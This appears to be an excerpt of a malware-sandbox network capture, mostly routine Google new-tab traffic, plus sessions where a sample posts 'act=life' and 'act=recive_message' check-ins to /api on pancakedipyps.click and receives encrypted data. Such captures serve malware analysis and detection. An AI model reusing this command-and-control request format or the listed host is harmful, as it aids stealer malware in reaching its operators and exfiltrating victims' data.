                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC1390INData Raw: 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 20 67 62 5f 6f 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 68 65 61 64 65 72 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 51 63 20 67 62 5f 4f 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 31 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64
                                                                                                                                                                                                                                                              Data Ascii: v\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_a gb_od\"\u003e\u003c\/div\u003e\u003c\/header\u003e\u003cdiv class\u003d\"gb_Qc gb_Oc\"\u003e\u003cdiv class\u003d\"gb_1c\"\u003e\u003cd
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC1390INData Raw: 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 79 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 7a 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 52 63 5c 22 29 3b 79 64 5c 75 30 30 32 36 5c 75 30 30 32 36 21 7a 64 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 78 64 28 5f 2e 67 64 2c 79 64 2c 5c 22 63 6c 69 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44
                                                                                                                                                                                                                                                              Data Ascii: achEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpException(e)}\ntry{\nvar yd\u003ddocument.querySelector(\".gb_I .gb_A\"),zd\u003ddocument.querySelector(\"#gb.gb_Rc\");yd\u0026\u0026!zd\u0026\u0026_.xd(_.gd,yd,\"click\");\n}catch(e){_._D
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC1390INData Raw: 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4c 64 28 5f 2e 48 64 3f 5f 2e 48 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 51 64 2c 64 65 2c 50 64 2c 52 64 2c 57 64 3b 5f 2e 4e 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 61 3a 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 66 75 6e 63 74 69
                                                                                                                                                                                                                                                              Data Ascii: uctor(a){this.i\u003da}toString(){return this.i+\"\"}};_.Md\u003dnew _.Ld(_.Hd?_.Hd.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Qd,de,Pd,Rd,Wd;_.Nd\u003dfunction(a){return a\u003d\u003dnull?a:Number.isFinite(a)?a|0:void 0};_.Od\u003dfuncti
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC1390INData Raw: 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 73 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4f 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4e 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 54 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 5f 2e 62 65 28 61 2c 62 29
                                                                                                                                                                                                                                                              Data Ascii: typeof a.length\u003d\u003d\"number\"};_.ae\u003dfunction(a,b,c){return _.sb(a,b,c,!1)!\u003d\u003dvoid 0};_.be\u003dfunction(a,b){return _.Od(_.Ec(a,b))};_.S\u003dfunction(a,b){return _.Nd(_.Ec(a,b))};_.T\u003dfunction(a,b,c\u003d0){return _.tb(_.be(a,b)


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              76192.168.2.450484142.250.181.132443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:21:04 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:21:04 GMT
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              77192.168.2.450485142.250.181.132443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:21:04 UTC369OUTGET /async/ddljson?async=ntp:2,es_dfp:72fefd38 HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              78192.168.2.450480142.250.181.132443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:21:04 UTC384OUTGET /async/ddllog?async=doodle:306735258,slot:22,type:1,cta:0 HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:21:04 GMT
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC137INData Raw: 38 33 0d 0a 29 5d 7d 27 0a 7b 22 64 64 6c 6c 6f 67 22 3a 7b 22 65 6e 63 6f 64 65 64 5f 65 69 22 3a 22 67 47 6c 6e 5a 38 79 73 4d 36 61 4f 37 4e 59 50 75 6f 44 70 6f 41 34 22 2c 22 74 61 72 67 65 74 5f 75 72 6c 5f 70 61 72 61 6d 73 22 3a 22 76 65 64 5c 75 30 30 33 64 32 61 68 55 4b 45 77 6a 4d 37 4f 69 4d 6d 37 71 4b 41 78 55 6d 42 39 73 45 48 54 70 41 47 75 51 51 50 58 6f 45 43 41 41 51 41 41 22 7d 7d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 83)]}'{"ddllog":{"encoded_ei":"gGlnZ8ysM6aO7NYPuoDpoA4","target_url_params":"ved\u003d2ahUKEwjM7OiMm7qKAxUmB9sEHTpAGuQQPXoECAAQAA"}}
                                                                                                                                                                                                                                                              2024-12-22 01:21:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              79192.168.2.450517172.67.209.202443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:21:34 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:21:34 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-22 01:21:35 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:21:35 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=hbf62g78q7011v8jfp4vqn42ba; expires=Wed, 16 Apr 2025 19:08:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qi1N3BPAygEMNWSWcTfByDkoQZZ3I7b9abzozMODUwgoLNKxj6r%2BDm55g0%2FVh%2F2W4KILfZXvpFb3aQuvwhqd%2B7W9DEeu1kwuiTTJ2H8tsXgwR3bnHw9dSXy6YP9lF0AjzSacr%2FGS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4bc33fe17ca2-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2014&rtt_var=766&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=910&delivery_rate=1449851&cwnd=239&unsent_bytes=0&cid=7acc13fe31909a51&ts=772&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:21:35 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                                              2024-12-22 01:21:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              80192.168.2.450520172.67.209.202443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:21:36 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 46
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:21:36 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                                                                                                                                                                                                                              2024-12-22 01:21:37 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:21:37 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=nicnods9p0ehou1rqcpbu821df; expires=Wed, 16 Apr 2025 19:08:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=omIES10HPzaUEB6hn8AaGtaOJWm1OY7IrELpQHJ1DIqIj2%2BSgKGhjOroKIDe3q2co9gyea8Jqgvbvi9d8TqjZIc9%2BhQR6bfSvzx9q%2FxVl%2BKjxJh4T8ZrLqPDYcvosZINJqoRfhkS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4bcfbf8542ec-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1601&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=949&delivery_rate=1736028&cwnd=183&unsent_bytes=0&cid=744950d3b9fe021f&ts=786&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:21:37 UTC242INData Raw: 34 36 62 0d 0a 4c 2f 4a 68 42 56 48 37 76 6c 51 4d 4a 4c 52 4c 59 76 75 31 49 41 6f 4e 64 69 62 51 67 30 72 52 54 53 74 55 67 6e 5a 6c 73 4c 56 55 30 42 63 6e 61 38 2b 53 64 6e 39 42 6c 6e 45 57 69 63 42 46 4a 69 38 58 51 76 4b 35 4c 4c 41 68 57 44 47 75 56 42 50 64 6c 78 57 55 41 47 6b 69 6e 70 4a 32 61 56 79 57 63 54 6d 41 6c 30 56 6b 4c 30 77 45 74 65 6b 6f 73 43 46 4a 4e 65 6b 5a 46 64 7a 57 52 35 34 47 62 54 53 59 32 6a 56 67 53 64 45 75 42 35 72 66 54 6d 4e 67 48 6b 76 79 72 32 69 30 4e 77 6c 75 6f 44 73 41 78 4e 52 69 6b 78 4a 75 63 34 61 53 4c 79 35 42 32 6d 6c 59 32 64 52 46 61 47 45 51 51 72 76 72 49 72 6b 70 53 44 44 6f 42 67 7a 57 33 55 65 51 42 57 77 2b 6b 63 34 34 61 6b 37 61 4b 41 32 61 6c 77 77 6f 61
                                                                                                                                                                                                                                                              Data Ascii: 46bL/JhBVH7vlQMJLRLYvu1IAoNdibQg0rRTStUgnZlsLVU0Bcna8+Sdn9BlnEWicBFJi8XQvK5LLAhWDGuVBPdlxWUAGkinpJ2aVyWcTmAl0VkL0wEtekosCFJNekZFdzWR54GbTSY2jVgSdEuB5rfTmNgHkvyr2i0NwluoDsAxNRikxJuc4aSLy5B2mlY2dRFaGEQQrvrIrkpSDDoBgzW3UeQBWw+kc44ak7aKA2alwwoa
                                                                                                                                                                                                                                                              2024-12-22 01:21:37 UTC896INData Raw: 41 77 45 36 71 46 37 67 53 78 59 4a 2f 55 5a 46 39 53 58 55 74 34 61 4a 7a 53 56 6e 47 34 75 54 74 6f 6e 42 5a 72 59 52 57 6c 76 42 6b 75 79 34 69 43 37 4b 30 4d 35 37 78 73 4a 32 4e 42 46 6d 51 52 6f 4e 4a 48 61 4f 57 30 47 6d 47 6b 48 67 5a 63 61 4b 45 38 45 52 37 48 31 4a 61 4a 76 56 6e 6a 35 56 41 44 65 6c 78 58 51 42 57 6b 79 6c 4e 77 6b 5a 6b 33 64 4c 42 4b 53 33 6b 39 6c 62 78 6c 4f 76 65 49 6f 74 43 56 44 4f 65 6f 51 43 74 2f 52 54 5a 42 44 4b 58 4f 65 78 48 59 32 42 76 55 73 45 4a 37 62 56 43 70 56 56 46 76 38 2b 47 69 30 49 77 6c 75 6f 42 77 43 30 64 52 47 6e 77 42 76 4f 49 76 63 4a 47 68 4c 30 7a 73 47 6e 4e 6c 49 61 33 30 65 53 72 54 69 49 62 67 6d 54 44 48 6b 56 45 6d 53 30 46 58 51 57 79 63 53 6c 4e 63 36 5a 46 48 57 61 52 2f 58 7a 67 4a 76
                                                                                                                                                                                                                                                              Data Ascii: AwE6qF7gSxYJ/UZF9SXUt4aJzSVnG4uTtonBZrYRWlvBkuy4iC7K0M57xsJ2NBFmQRoNJHaOW0GmGkHgZcaKE8ER7H1JaJvVnj5VADelxXQBWkylNwkZk3dLBKS3k9lbxlOveIotCVDOeoQCt/RTZBDKXOexHY2BvUsEJ7bVCpVVFv8+Gi0IwluoBwC0dRGnwBvOIvcJGhL0zsGnNlIa30eSrTiIbgmTDHkVEmS0FXQWycSlNc6ZFHWaR/XzgJv
                                                                                                                                                                                                                                                              2024-12-22 01:21:37 UTC1369INData Raw: 34 34 62 31 0d 0a 6d 59 52 4e 53 38 76 35 6d 71 6d 39 4f 4f 71 42 4d 52 39 33 59 51 70 67 44 5a 6a 65 55 32 44 64 6a 53 74 38 71 44 4a 58 66 54 32 52 72 47 30 79 36 34 69 43 68 49 55 63 77 35 68 51 43 6b 70 6b 4e 6c 78 73 6e 61 39 6e 34 4f 48 6c 53 33 57 73 31 6d 74 6c 4d 62 33 6c 55 57 2f 7a 34 61 4c 51 6a 43 57 36 67 47 67 72 5a 32 30 71 5a 41 6d 51 7a 6b 39 49 35 5a 45 37 65 4b 51 32 59 33 45 70 75 59 68 39 4c 76 65 59 67 73 43 4e 4d 4f 2b 4e 55 53 5a 4c 51 56 64 42 62 4a 78 61 58 33 79 64 2f 42 4f 4d 71 44 70 66 51 56 43 68 77 57 6c 33 79 35 69 54 7a 64 77 6b 38 35 78 4d 44 33 39 31 4f 6c 41 64 71 50 4a 44 56 50 33 78 4d 32 69 63 53 6c 4e 31 48 5a 6d 4d 52 53 37 4c 67 4b 62 30 6c 51 6e 61 75 56 41 44 4b 6c 78 58 51 4c 47 6f 6a 69 39 59 39 66 77 54 6a
                                                                                                                                                                                                                                                              Data Ascii: 44b1mYRNS8v5mqm9OOqBMR93YQpgDZjeU2DdjSt8qDJXfT2RrG0y64iChIUcw5hQCkpkNlxsna9n4OHlS3Ws1mtlMb3lUW/z4aLQjCW6gGgrZ20qZAmQzk9I5ZE7eKQ2Y3EpuYh9LveYgsCNMO+NUSZLQVdBbJxaX3yd/BOMqDpfQVChwWl3y5iTzdwk85xMD391OlAdqPJDVP3xM2icSlN1HZmMRS7LgKb0lQnauVADKlxXQLGoji9Y9fwTj
                                                                                                                                                                                                                                                              2024-12-22 01:21:37 UTC1369INData Raw: 63 61 4b 45 41 58 55 72 69 68 4e 2f 30 32 43 54 48 73 56 46 2b 53 33 55 47 55 41 47 73 36 6c 64 45 33 61 6b 48 62 4c 51 43 66 30 55 64 70 5a 42 78 49 76 65 73 6b 74 79 4e 41 4d 4f 77 58 42 4e 53 58 41 39 41 45 66 33 50 42 6e 42 64 6a 54 64 6f 70 41 34 6a 51 41 69 59 76 47 6b 4b 79 6f 58 43 6c 50 31 34 78 2f 31 6f 65 6b 74 42 42 30 46 73 6e 4f 59 76 5a 4f 47 70 4d 30 79 30 4d 6b 39 64 48 65 6d 63 53 51 37 37 70 4c 62 77 70 54 44 76 6e 48 77 54 41 78 55 36 55 44 57 74 7a 31 35 77 78 64 67 61 4f 61 53 57 4f 31 46 4a 75 62 46 52 62 2f 50 68 6f 74 43 4d 4a 62 71 41 55 43 64 37 63 53 70 73 49 59 7a 65 5a 30 54 31 67 53 4e 38 6c 43 4a 58 51 55 47 56 71 48 45 36 37 35 43 53 2b 4c 46 73 31 34 56 52 4a 6b 74 42 56 30 46 73 6e 46 4b 72 72 46 53 35 5a 6d 44 42 41 6e
                                                                                                                                                                                                                                                              Data Ascii: caKEAXUrihN/02CTHsVF+S3UGUAGs6ldE3akHbLQCf0UdpZBxIvesktyNAMOwXBNSXA9AEf3PBnBdjTdopA4jQAiYvGkKyoXClP14x/1oektBB0FsnOYvZOGpM0y0Mk9dHemcSQ77pLbwpTDvnHwTAxU6UDWtz15wxdgaOaSWO1FJubFRb/PhotCMJbqAUCd7cSpsIYzeZ0T1gSN8lCJXQUGVqHE675CS+LFs14VRJktBV0FsnFKrrFS5ZmDBAn
